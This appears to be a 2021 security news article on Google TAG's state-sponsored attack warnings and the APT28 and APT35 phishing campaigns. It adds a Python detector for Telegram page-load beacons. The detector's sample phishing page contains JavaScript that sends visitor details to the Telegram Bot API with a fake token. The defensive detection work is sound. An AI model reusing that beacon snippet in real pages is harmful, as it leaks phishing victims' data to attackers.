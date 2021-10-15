



Google has revealed that it has sent customers about 50,000 alerts about state-sponsored phishing or hacking attempts since January.

In 2021 Google disclosed that it had sent customers roughly 50,000 alerts about state-sponsored phishing or hacking attempts. The figures come from Google’s Threat Analysis Group (TAG), which tracks government-backed hacking campaigns, and are up by nearly a third on the same period of 2020.

“So far, more than 50,000 warnings have been sent in 2021, an increase of nearly 33% from this time in 2020. This surge is primarily due to anomalies by Russian actors known as APT28 or Fancy Bear. It’s because we blocked a large campaign,” wrote Ajax Bash, a security engineer at Google TAG.

Google TAG sends its warnings in batches to every user who may have been targeted by nation-state attackers, rather than in real time at the moment a threat is detected. Batching prevents an attacker from correlating a warning with the specific defensive action that triggered it, which would reveal how Google’s defenses work.

The most important campaigns for Google users were coordinated by the Russia-linked APT28 group (also known as Fancy Bear) and the Iran-linked APT35 (also known as Charming Kitten) group.

The APT28 group (also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and targets government, military, and security organizations around the world. The group was also behind a series of attacks on the 2016 US presidential election.

The group operates from Military Unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU), the 85th Main Special Service Center (GTsSS).

Most of the APT28 campaigns used spear phishing and malware-based attacks.

This one campaign accounted for 86% of the batch of alerts the Google team sent for the current month.

Google states that it blocked nearly all of the spear-phishing messages that the APT28 group sent to Gmail users.

Google researchers also warned of intense APT35 activity this year. The group has carried out malware-based attacks, account hijackings, and cyber-espionage campaigns that gather intelligence on behalf of the Iranian government. In early 2021, APT35 compromised websites affiliated with UK universities to host phishing kits targeting Gmail, Hotmail, and Yahoo users.

Between May 2020 and July 2021 the group also tried to deliver malware through a malicious app disguised as legitimate VPN software, uploaded to the Google Play Store and distributed through third-party platforms.

The Iran-linked APT35 group also sent conference-themed phishing emails to Gmail users, using the Munich Security Conference and the Think-20 (T20) Italy conference as lures. The group has also started using Telegram for operator notifications: it embeds JavaScript in its phishing pages that, as soon as the page loads, calls the Telegram API to tell the operators that a target has visited the page, together with details such as the visitor’s IP address and user agent.
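A page-load beacon of this kind is easy to spot in captured page source once you know what to look for. The script below is an added example written for this article; it is not Google TAG’s code and not the indicators Google published. It scans the HTML/JavaScript of a suspected phishing page for calls to the Telegram Bot API, extracts the bot token and chat_id as indicators, and records whether the page wires the call to a load event. The sample page, the bot token and the chat id inside it are constructed for the example; the token-length bounds in the regular expression are an assumption chosen to limit false positives.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Telegram Bot API endpoint as it appears in page source. The token shape
# (numeric bot id, colon, alphanumeric secret) follows Telegram's documented
# format; the length bounds are an assumption made for this example.
TELEGRAM_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,})"
    r"/(?P<method>sendMessage|sendDocument|sendPhoto)",
    re.IGNORECASE,
)
# chat_id passed in a query string, a JSON body or a form body.
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*['\"]?(?P<chat>-?\d{5,})")
# Hooks that run a script when the page has finished loading.
LOAD_HOOK_RE = re.compile(
    r"window\.onload|DOMContentLoaded|addEventListener\(\s*['\"]load['\"]"
    r"|<body[^>]*\sonload=",
    re.IGNORECASE,
)


@dataclass
class TelegramBeacon:
    token: str
    method: str
    chat_ids: List[str] = field(default_factory=list)
    fires_on_load: bool = False


def find_telegram_beacons(page: str) -> List[TelegramBeacon]:
    """Return one TelegramBeacon per distinct bot token referenced in `page`."""
    beacons = {}
    # Coarse heuristic: a load hook anywhere in the page. A precise answer
    # would need a JavaScript parser; plain string concatenation or other
    # obfuscation of the URL is also out of scope here.
    fires_on_load = bool(LOAD_HOOK_RE.search(page))
    for m in TELEGRAM_API_RE.finditer(page):
        token = m.group("token")
        beacon = beacons.setdefault(
            token, TelegramBeacon(token, m.group("method"), [], fires_on_load)
        )
        # The chat_id normally follows the URL closely: in its query string
        # or in a request body built right after it.
        window = page[m.end(): m.end() + 300]
        for c in CHAT_ID_RE.finditer(window):
            if c.group("chat") not in beacon.chat_ids:
                beacon.chat_ids.append(c.group("chat"))
    return list(beacons.values())


def redact_token(token: str) -> str:
    """Keep the bot id (useful as an indicator) and mask the secret half."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


# Constructed sample of a credential-phishing page with a Telegram beacon.
# The token and chat id are fake values made up for this example.
SAMPLE_PHISHING_PAGE = """
<html><body>
<form method="post" action="/login"><input name="user"><input name="pass" type="password"></form>
<script>
window.addEventListener('load', function () {
  var info = 'visit ' + location.href + ' ua=' + navigator.userAgent;
  fetch('https://api.telegram.org/bot123456789:AAE_fake-token-for-the-added-example-00000/sendMessage?chat_id=987654321&text=' + encodeURIComponent(info));
});
</script>
</body></html>
"""

# Constructed benign page: a login form with no beacon.
SAMPLE_BENIGN_PAGE = """
<html><body><form method="post" action="/login"><input name="user"></form>
<script>window.addEventListener('load', function () { console.log('ready'); });</script>
</body></html>
"""


def main() -> None:
    for name, page in (("phishing", SAMPLE_PHISHING_PAGE), ("benign", SAMPLE_BENIGN_PAGE)):
        beacons = find_telegram_beacons(page)
        print(f"{name}: {len(beacons)} Telegram beacon(s)")
        for b in beacons:
            print(f"  token={redact_token(b.token)} method={b.method} "
                  f"chat_ids={b.chat_ids} fires_on_load={b.fires_on_load}")


if __name__ == "__main__":
    main()
```

Run against a saved copy of a suspect page (for example the output of `curl -s` on a reported URL) and feed the bot id and chat_id into your blocklists or threat-intel notes; the unmasked token is also what you would report to Telegram to get the bot shut down.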

Google shared indicators related to hacking activities conducted by two state-sponsored hacker groups.

Pierluigi Paganini

